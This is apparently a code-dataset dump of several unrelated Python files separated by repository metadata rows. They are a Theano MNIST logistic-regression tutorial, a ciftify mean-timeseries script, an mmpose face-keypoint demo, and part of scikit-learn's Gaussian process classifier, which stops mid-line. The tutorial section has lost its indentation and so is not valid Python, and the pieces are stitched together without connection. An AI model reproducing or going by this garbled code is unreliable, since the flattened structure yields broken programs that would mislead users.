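# made-up minibatch of 3 examples and 4 classes:
def _numpy_mean_nll_sketch():
    p_y_given_x = numpy.array([[0.7, 0.1, 0.1, 0.1],
                               [0.2, 0.5, 0.2, 0.1],
                               [0.1, 0.1, 0.1, 0.7]])
    y = numpy.array([0, 1, 3])  # correct labels for the 3 examples
    log_p = numpy.log(p_y_given_x)
    # pick log P(Y=y[i] | x[i]) for every row i, then average over the batch
    return -numpy.mean(log_p[numpy.arange(y.shape[0]), y])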
def load_data(dataset):
''' Loads the dataset
:type dataset: string
:param dataset: the path to the dataset (here MNIST)
'''
#############
# LOAD DATA #
#############
# Download the MNIST dataset if it is not present
data_dir, data_file = os.path.split(dataset)
if data_dir == "" and not os.path.isfile(dataset):
# Check if dataset is in the data directory.
new_path = os.path.join(
os.path.split(__file__)[0],
"..",
"data",
dataset
)
if os.path.isfile(new_path) or data_file == 'mnist.pkl.gz':
dataset = new_path
if (not os.path.isfile(dataset)) and data_file == 'mnist.pkl.gz':
import urllib
origin = (
'http://www.iro.umontreal.ca/~lisa/deep/data/mnist/mnist.pkl.gz'
)
print 'Downloading data from %s' % origin
urllib.urlretrieve(origin, dataset)
print '... loading data'
# Load the dataset
f = gzip.open(dataset, 'rb')
train_set, valid_set, test_set = cPickle.load(f)
f.close()
#train_set, valid_set, test_set format: tuple(input, target)
#input is a numpy.ndarray of 2 dimensions (a matrix)
#whose rows correspond to an example. target is a
#numpy.ndarray of 1 dimension (a vector) that has the same length as
#the number of rows in the input. It should give the target
#to the example with the same index in the input.
def shared_dataset(data_xy, borrow=True):
""" Function that loads the dataset into shared variables
The reason we store our dataset in shared variables is to allow
Theano to copy it into the GPU memory (when code is run on GPU).
Since copying data into the GPU is slow, copying a minibatch every time
is needed (the default behaviour if the data is not in a shared
variable) would lead to a large decrease in performance.
"""
data_x, data_y = data_xy
shared_x = theano.shared(numpy.asarray(data_x,
dtype=theano.config.floatX),
borrow=borrow)
shared_y = theano.shared(numpy.asarray(data_y,
dtype=theano.config.floatX),
borrow=borrow)
# When storing data on the GPU it has to be stored as floats
# therefore we will store the labels as ``floatX`` as well
# (``shared_y`` does exactly that). But during our computations
# we need them as ints (we use labels as index, and if they are
# floats it doesn't make sense) therefore instead of returning
# ``shared_y`` we will have to cast it to int. This little hack
# lets us get around this issue
return shared_x, T.cast(shared_y, 'int32')
test_set_x, test_set_y = shared_dataset(test_set)
valid_set_x, valid_set_y = shared_dataset(valid_set)
train_set_x, train_set_y = shared_dataset(train_set)
rval = [(train_set_x, train_set_y), (valid_set_x, valid_set_y),
(test_set_x, test_set_y)]
return rval
def sgd_optimization_mnist(learning_rate=0.13, n_epochs=1000,
dataset='mnist.pkl.gz',
batch_size=600):
"""
Demonstrate stochastic gradient descent optimization of a log-linear
model
This is demonstrated on MNIST.
:type learning_rate: float
:param learning_rate: learning rate used (factor for the stochastic
gradient)
:type n_epochs: int
:param n_epochs: maximal number of epochs to run the optimizer
:type dataset: string
:param dataset: the path of the MNIST dataset file from
http://www.iro.umontreal.ca/~lisa/deep/data/mnist/mnist.pkl.gz
"""
datasets = load_data(dataset)
train_set_x, train_set_y = datasets[0]
valid_set_x, valid_set_y = datasets[1]
test_set_x, test_set_y = datasets[2]
# compute number of minibatches for training, validation and testing
n_train_batches = train_set_x.get_value(borrow=True).shape[0] / batch_size
n_valid_batches = valid_set_x.get_value(borrow=True).shape[0] / batch_size
n_test_batches = test_set_x.get_value(borrow=True).shape[0] / batch_size
######################
# BUILD ACTUAL MODEL #
######################
print '... building the model'
# allocate symbolic variables for the data
index = T.lscalar() # index to a [mini]batch
# generate symbolic variables for input (x and y represent a
# minibatch)
x = T.matrix('x') # data, presented as rasterized images
y = T.ivector('y') # labels, presented as 1D vector of [int] labels
# construct the logistic regression class
# Each MNIST image has size 28*28
classifier = LogisticRegression(input=x, n_in=28 * 28, n_out=10)
# the cost we minimize during training is the negative log likelihood of
# the model in symbolic format
cost = classifier.negative_log_likelihood(y)
# compiling a Theano function that computes the mistakes that are made by
# the model on a minibatch
test_model = theano.function(
inputs=[index],
outputs=classifier.errors(y),
givens={
x: test_set_x[index * batch_size: (index + 1) * batch_size],
y: test_set_y[index * batch_size: (index + 1) * batch_size]
}
)
validate_model = theano.function(
inputs=[index],
outputs=classifier.errors(y),
givens={
x: valid_set_x[index * batch_size: (index + 1) * batch_size],
y: valid_set_y[index * batch_size: (index + 1) * batch_size]
}
)
# compute the gradient of cost with respect to theta = (W,b)
g_W = T.grad(cost=cost, wrt=classifier.W)
g_b = T.grad(cost=cost, wrt=classifier.b)
# start-snippet-3
# specify how to update the parameters of the model as a list of
# (variable, update expression) pairs.
updates = [(classifier.W, classifier.W - learning_rate * g_W),
(classifier.b, classifier.b - learning_rate * g_b)]
# compiling a Theano function `train_model` that returns the cost, but in
# the same time updates the parameter of the model based on the rules
# defined in `updates`
train_model = theano.function(
inputs=[index],
outputs=cost,
updates=updates,
givens={
x: train_set_x[index * batch_size: (index + 1) * batch_size],
y: train_set_y[index * batch_size: (index + 1) * batch_size]
}
)
# end-snippet-3
###############
# TRAIN MODEL #
###############
print '... training the model'
# early-stopping parameters
patience = 5000 # look at this many examples regardless
patience_increase = 2 # wait this much longer when a new best is
# found
improvement_threshold = 0.995 # a relative improvement of this much is
# considered significant
validation_frequency = min(n_train_batches, patience / 2)
# go through this many
# minibatches before checking the network
# on the validation set; in this case we
# check every epoch
best_validation_loss = numpy.inf
test_score = 0.
start_time = time.clock()
done_looping = False
epoch = 0
while (epoch < n_epochs) and (not done_looping):
epoch = epoch + 1
for minibatch_index in xrange(n_train_batches):
minibatch_avg_cost = train_model(minibatch_index)
# iteration number
iter = (epoch - 1) * n_train_batches + minibatch_index
if (iter + 1) % validation_frequency == 0:
# compute zero-one loss on validation set
validation_losses = [validate_model(i)
for i in xrange(n_valid_batches)]
this_validation_loss = numpy.mean(validation_losses)
print(
'epoch %i, minibatch %i/%i, validation error %f %%' %
(
epoch,
minibatch_index + 1,
n_train_batches,
this_validation_loss * 100.
)
)
# if we got the best validation score until now
if this_validation_loss < best_validation_loss:
#improve patience if loss improvement is good enough
if this_validation_loss < best_validation_loss * \
improvement_threshold:
patience = max(patience, iter * patience_increase)
best_validation_loss = this_validation_loss
# test it on the test set
test_losses = [test_model(i)
for i in xrange(n_test_batches)]
test_score = numpy.mean(test_losses)
print(
(
' epoch %i, minibatch %i/%i, test error of'
' best model %f %%'
) %
(
epoch,
minibatch_index + 1,
n_train_batches,
test_score * 100.
)
)
if patience <= iter:
done_looping = True
break
end_time = time.clock()
print(
(
'Optimization complete with best validation score of %f %%,'
'with test performance %f %%'
)
% (best_validation_loss * 100., test_score * 100.)
)
print 'The code ran for %d epochs, with %f epochs/sec' % (
epoch, 1. * epoch / (end_time - start_time))
print >> sys.stderr, ('The code for file ' +
os.path.split(__file__)[1] +
' ran for %.1fs' % ((end_time - start_time)))
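# --- Illustrative sketch (not part of the original tutorial) -----------------
# The early-stopping block above can be read in isolation as: keep a budget of
# iterations (patience) and extend it whenever the validation loss improves by
# more than improvement_threshold. A condensed, made-up version of that rule:
def _early_stopping_sketch(validation_losses, patience=10,
                           patience_increase=2, improvement_threshold=0.995):
    best = float('inf')
    for it, loss in enumerate(validation_losses):
        if loss < best:
            if loss < best * improvement_threshold:
                patience = max(patience, it * patience_increase)
            best = loss
        if patience <= it:
            break
    return best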
if __name__ == '__main__':
sgd_optimization_mnist()
| 36.714612 | 79 | 0.582551 |
5d4842c1e6e59a91e18bae3634209faf45079985 | 6,225 | py | Python | ciftify/bin/ciftify_meants.py | lgrennan/ciftify | 8488423bd081370614b676a2e1d1a8dbfd9aba1c | [
"MIT"
] | null | null | null | ciftify/bin/ciftify_meants.py | lgrennan/ciftify | 8488423bd081370614b676a2e1d1a8dbfd9aba1c | [
"MIT"
] | null | null | null | ciftify/bin/ciftify_meants.py | lgrennan/ciftify | 8488423bd081370614b676a2e1d1a8dbfd9aba1c | [
"MIT"
] | null | null | null | #!/usr/bin/env python
"""
Produces a csv file mean voxel/vertex time series from a functional file <func>
within a seed mask <seed>.
Usage:
ciftify_meants [options] <func> <seed>
Arguments:
<func> functional data can be (nifti or cifti)
<seed> seed mask (nifti, cifti or gifti)
Options:
--outputcsv PATH Specify the output filename
--outputlabels PATH Specity a file to print the ROI row ids to.
--mask FILE brainmask (file format should match seed)
--roi-label INT Specify the numeric label of the ROI you want a seedmap for
--weighted Compute weighted average timeseries from the seed map
--hemi HEMI If the seed is a gifti file, specify the hemisphere (R or L) here
-v,--verbose Verbose logging
--debug Debug logging
-h, --help Prints this message
DETAILS:
The default output filename is <func>_<seed>_meants.csv inside the same directory
as the <func> file. This can be changed by specifying the full path after
the '--outputcsv' option. The integer labels for the seeds extracted can be printed
to text using the '--outputlabels' option.
If the seed file contains multiple integer values (i.e. an atlas), one row will
be written for each integer value. If you only want a timeseries from one roi in
an atlas, you can specify the integer with the --roi-label option.
A weighted average can be calculated from a continuous seed if the --weighted
flag is given.
If a mask is given, the intersection of this mask and the seed mask will be taken.
If a nifti seed is given for a cifti functional file, wb_command -cifti separate will
try to extract the subcortical cifti data and work with that.
Written by Erin W Dickie, March 17, 2016
"""
import sys
import subprocess
import os
import tempfile
import shutil
import logging
import logging.config
import numpy as np
import scipy as sp
import nibabel as nib
from docopt import docopt
import ciftify
from ciftify.meants import MeantsSettings
logger = logging.getLogger('ciftify')
logger.setLevel(logging.DEBUG)
def run_ciftify_meants(settings):
'''run ciftify_meants workflow '''
## if seed is dlabel - convert to dscalar
if ".dlabel.nii" in settings.seed.path:
## apologise for all the cases where this approach doesn't work..
if settings.weighted:
logger.error('--weighted mean time-series cannot be calculated with a .dlabel.nii seed. Exiting.')
sys.exit(1)
if settings.roi_label:
logger.error("Sorry, --roi-label option doesn't work for .dlabel.nii seed inputs. Exiting.")
sys.exit(1)
if settings.mask:
logger.error("Sorry, --mask option doesn't work for .dlabel.nii seed inputs. Exiting.")
sys.exit(1)
if not settings.func.type == 'cifti':
logger.error("If <seed> is .dlabel.nii, the <func> needs to be a cifti file. Exiting.")
sys.exit(1)
## parcellate and then write out the parcellations..
cifti_parcellate_to_meants(settings)
else:
## calculate the meants using numpy
_ = ciftify.meants.calc_meants_with_numpy(settings, outputlabels = settings.outputlabels)
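# --- Illustrative sketch (not part of ciftify) --------------------------------
# calc_meants_with_numpy lives in ciftify.meants; the idea described in the
# module docstring (one mean time series per integer label in the seed) boils
# down to the following, ignoring masks, weights and file I/O. The names and
# the background convention below are assumptions for illustration only.
def _mean_timeseries_per_label_sketch(func_data, seed_labels):
    '''func_data: (n_voxels, n_timepoints) array; seed_labels: (n_voxels,) ints'''
    rows = []
    for label in np.unique(seed_labels):
        if label == 0:
            continue  # assume 0 marks background
        rows.append(func_data[seed_labels == label, :].mean(axis=0))
    return np.vstack(rows)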
def cifti_parcellate_to_meants(settings):
''' use wb_command -cifti-parcellate to create meants..much faster '''
with ciftify.utils.TempDir() as tempdir:
## parcellate and then write out the parcellations..
if settings.func.path.endswith('dtseries.nii'):
tmp_parcelated = os.path.join(tempdir, 'parcellated.ptseries.nii')
if settings.func.path.endswith('dscalar.nii'):
tmp_parcelated = os.path.join(tempdir, 'parcellated.pscalar.nii')
ciftify.utils.run(['wb_command', '-cifti-parcellate',
settings.func.path, settings.seed.path,
'COLUMN', tmp_parcelated])
ciftify.utils.run(['wb_command', '-cifti-convert', '-to-text',
tmp_parcelated, settings.outputcsv,'-col-delim ","'])
if settings.outputlabels:
temp_wb_labels = os.path.join(tempdir, 'wb_labels.txt')
ciftify.utils.run(['wb_command', '-cifti-label-export-table',
settings.seed.path, '1',
temp_wb_labels])
ciftify.io.wb_labels_to_csv(temp_wb_labels, csv_out= settings.outputlabels)
class UserSettings(MeantsSettings):
def __init__(self, arguments):
MeantsSettings.__init__(self, arguments)
self.outputcsv = self.get_outputcsv(arguments['--outputcsv'])
self.outputlabels = self.get_outputlabels(arguments['--outputlabels'])
def check_output_path(self, path):
''' use ciftify function to ensure output is writable'''
ciftify.utils.check_output_writable(path)
return(path)
def get_outputcsv(self, outputcsv):
'''
determine func and seed filetypes
if outputcsv path doesn't exist, make one out of the func and seed names
'''
if not outputcsv:
outputdir = os.path.dirname(self.func.path)
outputcsv = os.path.join(outputdir,self.func.base + '_' + self.seed.base + '_meants.csv' )
outputcsv = self.check_output_path(outputcsv)
return(outputcsv)
def get_outputlabels(self,outputlabels):
'''if outputlabels were specified, check that they are writable '''
if outputlabels:
self.check_output_path(outputlabels)
return(outputlabels)
def main():
arguments = docopt(__doc__)
debug = arguments['--debug']
verbose = arguments['--verbose']
ch = logging.StreamHandler()
ch.setLevel(logging.WARNING)
if verbose:
ch.setLevel(logging.INFO)
if debug:
ch.setLevel(logging.DEBUG)
logger.addHandler(ch)
## set up the top of the log
logger.info('{}{}'.format(ciftify.utils.ciftify_logo(),
ciftify.utils.section_header('Starting ciftify_meants')))
ciftify.utils.log_arguments(arguments)
settings = UserSettings(arguments)
ret = run_ciftify_meants(settings)
logger.info(ciftify.utils.section_header('Done ciftify_meants'))
sys.exit(ret)
if __name__ == '__main__':
main()
| 36.403509 | 110 | 0.675823 |
981c68d18cfcc3f32b5687822cdb7f1db3df0edb | 3,505 | py | Python | demo/face_img_demo.py | ssumin6/buob | 4fb4537423a993cd2894f54cb12f5f3b3fb73141 | [
"Apache-2.0"
] | 367 | 2022-01-14T03:32:25.000Z | 2022-03-31T04:48:20.000Z | demo/face_img_demo.py | ssumin6/buob | 4fb4537423a993cd2894f54cb12f5f3b3fb73141 | [
"Apache-2.0"
] | 27 | 2022-01-27T07:12:49.000Z | 2022-03-31T04:31:13.000Z | demo/face_img_demo.py | ssumin6/buob | 4fb4537423a993cd2894f54cb12f5f3b3fb73141 | [
"Apache-2.0"
] | 53 | 2022-01-18T11:21:43.000Z | 2022-03-31T06:42:41.000Z | import os
from argparse import ArgumentParser
from mmpose.apis import (inference_top_down_pose_model, init_pose_model,
vis_pose_result)
try:
import face_recognition
has_face_det = True
except (ImportError, ModuleNotFoundError):
has_face_det = False
def process_face_det_results(face_det_results):
"""Process det results, and return a list of bboxes.
:param face_det_results: (top, right, bottom and left)
:return: a list of detected bounding boxes (x,y,x,y)-format
"""
person_results = []
for bbox in face_det_results:
person = {}
# left, top, right, bottom
person['bbox'] = [bbox[3], bbox[0], bbox[1], bbox[2]]
person_results.append(person)
return person_results
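# --- Illustrative example (not part of the original demo) --------------------
# face_recognition returns boxes as (top, right, bottom, left); the helper
# above reorders them into the (x1, y1, x2, y2) format expected by
# inference_top_down_pose_model. The numbers below are made up.
def _example_process_face_det_results():
    boxes = [(30, 120, 90, 40)]  # (top, right, bottom, left)
    return process_face_det_results(boxes)  # -> [{'bbox': [40, 30, 120, 90]}]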
def main():
"""Visualize the demo images.
Using face_recognition to detect faces.
"""
parser = ArgumentParser()
parser.add_argument('pose_config', help='Config file for pose')
parser.add_argument('pose_checkpoint', help='Checkpoint file for pose')
parser.add_argument('--img-root', type=str, default='', help='Image root')
parser.add_argument('--img', type=str, default='', help='Image file')
parser.add_argument(
'--show',
action='store_true',
default=False,
help='whether to show img')
parser.add_argument(
'--out-img-root',
type=str,
default='',
help='root of the output img file. '
'Default not saving the visualization images.')
parser.add_argument(
'--device', default='cuda:0', help='Device used for inference')
parser.add_argument(
'--kpt-thr', type=float, default=0.3, help='Keypoint score threshold')
assert has_face_det, 'Please install face_recognition to run the demo. ' \
'"pip install face_recognition", For more details, ' \
'see https://github.com/ageitgey/face_recognition'
args = parser.parse_args()
assert args.show or (args.out_img_root != '')
assert args.img != ''
# build the pose model from a config file and a checkpoint file
pose_model = init_pose_model(
args.pose_config, args.pose_checkpoint, device=args.device.lower())
dataset = pose_model.cfg.data['test']['type']
image_name = os.path.join(args.img_root, args.img)
# test a single image, the resulting box is (top, right, bottom and left)
image = face_recognition.load_image_file(image_name)
face_det_results = face_recognition.face_locations(image)
# keep the detected face bounding boxes.
face_results = process_face_det_results(face_det_results)
# optional
return_heatmap = False
# e.g. use ('backbone', ) to return backbone feature
output_layer_names = None
pose_results, returned_outputs = inference_top_down_pose_model(
pose_model,
image_name,
face_results,
bbox_thr=None,
format='xyxy',
dataset=dataset,
return_heatmap=return_heatmap,
outputs=output_layer_names)
if args.out_img_root == '':
out_file = None
else:
os.makedirs(args.out_img_root, exist_ok=True)
out_file = os.path.join(args.out_img_root, f'vis_{args.img}')
# show the results
vis_pose_result(
pose_model,
image_name,
pose_results,
dataset=dataset,
kpt_score_thr=args.kpt_thr,
show=args.show,
out_file=out_file)
if __name__ == '__main__':
main()
| 30.215517 | 79 | 0.650214 |
072cf80dba250eb8e6807e736868104e759ce0a0 | 33,276 | py | Python | site-packages/sklearn/gaussian_process/_gpc.py | linusg/Pyto | eab3c3e093a8cace53d5b9425d1af2f535d456ee | [
"MIT"
] | 2 | 2020-08-25T13:55:00.000Z | 2020-08-25T16:36:03.000Z | site-packages/sklearn/gaussian_process/_gpc.py | linusg/Pyto | eab3c3e093a8cace53d5b9425d1af2f535d456ee | [
"MIT"
] | 1 | 2020-04-25T20:36:07.000Z | 2020-04-25T20:36:07.000Z | site-packages/sklearn/gaussian_process/_gpc.py | Wristlebane/Pyto | 901ac307b68486d8289105c159ca702318bea5b0 | [
"MIT"
] | null | null | null | """Gaussian processes classification."""
# Authors: Jan Hendrik Metzen <jhm@informatik.uni-bremen.de>
#
# License: BSD 3 clause
from operator import itemgetter
import numpy as np
from scipy.linalg import cholesky, cho_solve, solve
import scipy.optimize
from scipy.special import erf, expit
from ..base import BaseEstimator, ClassifierMixin, clone
from .kernels \
import RBF, CompoundKernel, ConstantKernel as C
from ..utils.validation import check_X_y, check_is_fitted, check_array
from ..utils import check_random_state
from ..utils.optimize import _check_optimize_result
from ..preprocessing import LabelEncoder
from ..multiclass import OneVsRestClassifier, OneVsOneClassifier
# Values required for approximating the logistic sigmoid by
# error functions. coefs are obtained via:
# x = np.array([0, 0.6, 2, 3.5, 4.5, np.inf])
# b = logistic(x)
# A = (erf(np.dot(x, self.lambdas)) + 1) / 2
# coefs = lstsq(A, b)[0]
LAMBDAS = np.array([0.41, 0.4, 0.37, 0.44, 0.39])[:, np.newaxis]
COEFS = np.array([-1854.8214151, 3516.89893646, 221.29346712,
128.12323805, -2010.49422654])[:, np.newaxis]
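# --- Illustrative check (not part of scikit-learn) ---------------------------
# The comment above describes how COEFS was fitted so that a linear combination
# of error functions approximates the logistic sigmoid. A standalone, made-up
# helper to inspect how close that approximation is on a grid of inputs:
def _erf_logistic_approx_error():
    x = np.linspace(-8., 8., 161)
    approx = (COEFS * (erf(LAMBDAS * x) + 1) / 2).sum(axis=0)
    return np.max(np.abs(expit(x) - approx))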
class _BinaryGaussianProcessClassifierLaplace(BaseEstimator):
"""Binary Gaussian process classification based on Laplace approximation.
The implementation is based on Algorithm 3.1, 3.2, and 5.1 of
``Gaussian Processes for Machine Learning'' (GPML) by Rasmussen and
Williams.
Internally, the Laplace approximation is used for approximating the
non-Gaussian posterior by a Gaussian.
Currently, the implementation is restricted to using the logistic link
function.
.. versionadded:: 0.18
Parameters
----------
kernel : kernel object
The kernel specifying the covariance function of the GP. If None is
passed, the kernel "1.0 * RBF(1.0)" is used as default. Note that
the kernel's hyperparameters are optimized during fitting.
optimizer : string or callable, optional (default: "fmin_l_bfgs_b")
Can either be one of the internally supported optimizers for optimizing
the kernel's parameters, specified by a string, or an externally
defined optimizer passed as a callable. If a callable is passed, it
must have the signature::
def optimizer(obj_func, initial_theta, bounds):
# * 'obj_func' is the objective function to be maximized, which
# takes the hyperparameters theta as parameter and an
# optional flag eval_gradient, which determines if the
# gradient is returned additionally to the function value
# * 'initial_theta': the initial value for theta, which can be
# used by local optimizers
# * 'bounds': the bounds on the values of theta
....
# Returned are the best found hyperparameters theta and
# the corresponding value of the target function.
return theta_opt, func_min
Per default, the 'L-BFGS-B' algorithm from scipy.optimize.minimize
is used. If None is passed, the kernel's parameters are kept fixed.
Available internal optimizers are::
'fmin_l_bfgs_b'
n_restarts_optimizer: int, optional (default: 0)
The number of restarts of the optimizer for finding the kernel's
parameters which maximize the log-marginal likelihood. The first run
of the optimizer is performed from the kernel's initial parameters,
the remaining ones (if any) from thetas sampled log-uniform randomly
from the space of allowed theta-values. If greater than 0, all bounds
must be finite. Note that n_restarts_optimizer=0 implies that one
run is performed.
max_iter_predict: int, optional (default: 100)
The maximum number of iterations in Newton's method for approximating
the posterior during predict. Smaller values will reduce computation
time at the cost of worse results.
warm_start : bool, optional (default: False)
If warm-starts are enabled, the solution of the last Newton iteration
on the Laplace approximation of the posterior mode is used as
initialization for the next call of _posterior_mode(). This can speed
up convergence when _posterior_mode is called several times on similar
problems as in hyperparameter optimization. See :term:`the Glossary
<warm_start>`.
copy_X_train : bool, optional (default: True)
If True, a persistent copy of the training data is stored in the
object. Otherwise, just a reference to the training data is stored,
which might cause predictions to change if the data is modified
externally.
random_state : int, RandomState instance or None, optional (default: None)
The generator used to initialize the centers. If int, random_state is
the seed used by the random number generator; If RandomState instance,
random_state is the random number generator; If None, the random number
generator is the RandomState instance used by `np.random`.
Attributes
----------
X_train_ : array-like of shape (n_samples, n_features)
Feature values in training data (also required for prediction)
y_train_ : array-like of shape (n_samples,)
Target values in training data (also required for prediction)
classes_ : array-like of shape (n_classes,)
Unique class labels.
kernel_ : kernel object
The kernel used for prediction. The structure of the kernel is the
same as the one passed as parameter but with optimized hyperparameters
L_ : array-like of shape (n_samples, n_samples)
Lower-triangular Cholesky decomposition of the kernel in X_train_
pi_ : array-like of shape (n_samples,)
The probabilities of the positive class for the training points
X_train_
W_sr_ : array-like of shape (n_samples,)
Square root of W, the Hessian of log-likelihood of the latent function
values for the observed labels. Since W is diagonal, only the diagonal
of sqrt(W) is stored.
log_marginal_likelihood_value_ : float
The log-marginal-likelihood of ``self.kernel_.theta``
"""
def __init__(self, kernel=None, optimizer="fmin_l_bfgs_b",
n_restarts_optimizer=0, max_iter_predict=100,
warm_start=False, copy_X_train=True, random_state=None):
self.kernel = kernel
self.optimizer = optimizer
self.n_restarts_optimizer = n_restarts_optimizer
self.max_iter_predict = max_iter_predict
self.warm_start = warm_start
self.copy_X_train = copy_X_train
self.random_state = random_state
def fit(self, X, y):
"""Fit Gaussian process classification model
Parameters
----------
X : array-like of shape (n_samples, n_features)
Training data
y : array-like of shape (n_samples,)
Target values, must be binary
Returns
-------
self : returns an instance of self.
"""
if self.kernel is None: # Use an RBF kernel as default
self.kernel_ = C(1.0, constant_value_bounds="fixed") \
* RBF(1.0, length_scale_bounds="fixed")
else:
self.kernel_ = clone(self.kernel)
self.rng = check_random_state(self.random_state)
self.X_train_ = np.copy(X) if self.copy_X_train else X
# Encode class labels and check that it is a binary classification
# problem
label_encoder = LabelEncoder()
self.y_train_ = label_encoder.fit_transform(y)
self.classes_ = label_encoder.classes_
if self.classes_.size > 2:
raise ValueError("%s supports only binary classification. "
"y contains classes %s"
% (self.__class__.__name__, self.classes_))
elif self.classes_.size == 1:
raise ValueError("{0:s} requires 2 classes; got {1:d} class"
.format(self.__class__.__name__,
self.classes_.size))
if self.optimizer is not None and self.kernel_.n_dims > 0:
# Choose hyperparameters based on maximizing the log-marginal
# likelihood (potentially starting from several initial values)
def obj_func(theta, eval_gradient=True):
if eval_gradient:
lml, grad = self.log_marginal_likelihood(
theta, eval_gradient=True, clone_kernel=False)
return -lml, -grad
else:
return -self.log_marginal_likelihood(theta,
clone_kernel=False)
# First optimize starting from theta specified in kernel
optima = [self._constrained_optimization(obj_func,
self.kernel_.theta,
self.kernel_.bounds)]
# Additional runs are performed from log-uniform chosen initial
# theta
if self.n_restarts_optimizer > 0:
if not np.isfinite(self.kernel_.bounds).all():
raise ValueError(
"Multiple optimizer restarts (n_restarts_optimizer>0) "
"requires that all bounds are finite.")
bounds = self.kernel_.bounds
for iteration in range(self.n_restarts_optimizer):
theta_initial = np.exp(self.rng.uniform(bounds[:, 0],
bounds[:, 1]))
optima.append(
self._constrained_optimization(obj_func, theta_initial,
bounds))
# Select result from run with minimal (negative) log-marginal
# likelihood
lml_values = list(map(itemgetter(1), optima))
self.kernel_.theta = optima[np.argmin(lml_values)][0]
self.log_marginal_likelihood_value_ = -np.min(lml_values)
else:
self.log_marginal_likelihood_value_ = \
self.log_marginal_likelihood(self.kernel_.theta)
# Precompute quantities required for predictions which are independent
# of actual query points
K = self.kernel_(self.X_train_)
_, (self.pi_, self.W_sr_, self.L_, _, _) = \
self._posterior_mode(K, return_temporaries=True)
return self
def predict(self, X):
"""Perform classification on an array of test vectors X.
Parameters
----------
X : array-like of shape (n_samples, n_features)
Returns
-------
C : ndarray of shape (n_samples,)
Predicted target values for X, values are from ``classes_``
"""
check_is_fitted(self)
# As discussed on Section 3.4.2 of GPML, for making hard binary
# decisions, it is enough to compute the MAP of the posterior and
# pass it through the link function
K_star = self.kernel_(self.X_train_, X) # K_star =k(x_star)
f_star = K_star.T.dot(self.y_train_ - self.pi_) # Algorithm 3.2,Line 4
return np.where(f_star > 0, self.classes_[1], self.classes_[0])
def predict_proba(self, X):
"""Return probability estimates for the test vector X.
Parameters
----------
X : array-like of shape (n_samples, n_features)
Returns
-------
C : array-like of shape (n_samples, n_classes)
Returns the probability of the samples for each class in
the model. The columns correspond to the classes in sorted
order, as they appear in the attribute ``classes_``.
"""
check_is_fitted(self)
# Based on Algorithm 3.2 of GPML
K_star = self.kernel_(self.X_train_, X) # K_star =k(x_star)
f_star = K_star.T.dot(self.y_train_ - self.pi_) # Line 4
v = solve(self.L_, self.W_sr_[:, np.newaxis] * K_star) # Line 5
# Line 6 (compute np.diag(v.T.dot(v)) via einsum)
var_f_star = self.kernel_.diag(X) - np.einsum("ij,ij->j", v, v)
# Line 7:
# Approximate \int log(z) * N(z | f_star, var_f_star)
# Approximation is due to Williams & Barber, "Bayesian Classification
# with Gaussian Processes", Appendix A: Approximate the logistic
# sigmoid by a linear combination of 5 error functions.
# For information on how this integral can be computed see
# blitiri.blogspot.de/2012/11/gaussian-integral-of-error-function.html
alpha = 1 / (2 * var_f_star)
gamma = LAMBDAS * f_star
integrals = np.sqrt(np.pi / alpha) \
* erf(gamma * np.sqrt(alpha / (alpha + LAMBDAS**2))) \
/ (2 * np.sqrt(var_f_star * 2 * np.pi))
pi_star = (COEFS * integrals).sum(axis=0) + .5 * COEFS.sum()
return np.vstack((1 - pi_star, pi_star)).T
def log_marginal_likelihood(self, theta=None, eval_gradient=False,
clone_kernel=True):
"""Returns log-marginal likelihood of theta for training data.
Parameters
----------
theta : array-like of shape (n_kernel_params,) or None
Kernel hyperparameters for which the log-marginal likelihood is
evaluated. If None, the precomputed log_marginal_likelihood
of ``self.kernel_.theta`` is returned.
eval_gradient : bool, default: False
If True, the gradient of the log-marginal likelihood with respect
to the kernel hyperparameters at position theta is returned
additionally. If True, theta must not be None.
clone_kernel : bool, default=True
If True, the kernel attribute is copied. If False, the kernel
attribute is modified, but may result in a performance improvement.
Returns
-------
log_likelihood : float
Log-marginal likelihood of theta for training data.
log_likelihood_gradient : array, shape = (n_kernel_params,), optional
Gradient of the log-marginal likelihood with respect to the kernel
hyperparameters at position theta.
Only returned when eval_gradient is True.
"""
if theta is None:
if eval_gradient:
raise ValueError(
"Gradient can only be evaluated for theta!=None")
return self.log_marginal_likelihood_value_
if clone_kernel:
kernel = self.kernel_.clone_with_theta(theta)
else:
kernel = self.kernel_
kernel.theta = theta
if eval_gradient:
K, K_gradient = kernel(self.X_train_, eval_gradient=True)
else:
K = kernel(self.X_train_)
# Compute log-marginal-likelihood Z and also store some temporaries
# which can be reused for computing Z's gradient
Z, (pi, W_sr, L, b, a) = \
self._posterior_mode(K, return_temporaries=True)
if not eval_gradient:
return Z
# Compute gradient based on Algorithm 5.1 of GPML
d_Z = np.empty(theta.shape[0])
# XXX: Get rid of the np.diag() in the next line
R = W_sr[:, np.newaxis] * cho_solve((L, True), np.diag(W_sr)) # Line 7
C = solve(L, W_sr[:, np.newaxis] * K) # Line 8
# Line 9: (use einsum to compute np.diag(C.T.dot(C))))
s_2 = -0.5 * (np.diag(K) - np.einsum('ij, ij -> j', C, C)) \
* (pi * (1 - pi) * (1 - 2 * pi)) # third derivative
for j in range(d_Z.shape[0]):
C = K_gradient[:, :, j] # Line 11
# Line 12: (R.T.ravel().dot(C.ravel()) = np.trace(R.dot(C)))
s_1 = .5 * a.T.dot(C).dot(a) - .5 * R.T.ravel().dot(C.ravel())
b = C.dot(self.y_train_ - pi) # Line 13
s_3 = b - K.dot(R.dot(b)) # Line 14
d_Z[j] = s_1 + s_2.T.dot(s_3) # Line 15
return Z, d_Z
def _posterior_mode(self, K, return_temporaries=False):
"""Mode-finding for binary Laplace GPC and fixed kernel.
This approximates the posterior of the latent function values for given
inputs and target observations with a Gaussian approximation and uses
Newton's iteration to find the mode of this approximation.
"""
# Based on Algorithm 3.1 of GPML
# If warm_start are enabled, we reuse the last solution for the
# posterior mode as initialization; otherwise, we initialize with 0
if self.warm_start and hasattr(self, "f_cached") \
and self.f_cached.shape == self.y_train_.shape:
f = self.f_cached
else:
f = np.zeros_like(self.y_train_, dtype=np.float64)
# Use Newton's iteration method to find mode of Laplace approximation
log_marginal_likelihood = -np.inf
for _ in range(self.max_iter_predict):
# Line 4
pi = expit(f)
W = pi * (1 - pi)
# Line 5
W_sr = np.sqrt(W)
W_sr_K = W_sr[:, np.newaxis] * K
B = np.eye(W.shape[0]) + W_sr_K * W_sr
L = cholesky(B, lower=True)
# Line 6
b = W * f + (self.y_train_ - pi)
# Line 7
a = b - W_sr * cho_solve((L, True), W_sr_K.dot(b))
# Line 8
f = K.dot(a)
# Line 10: Compute log marginal likelihood in loop and use as
# convergence criterion
lml = -0.5 * a.T.dot(f) \
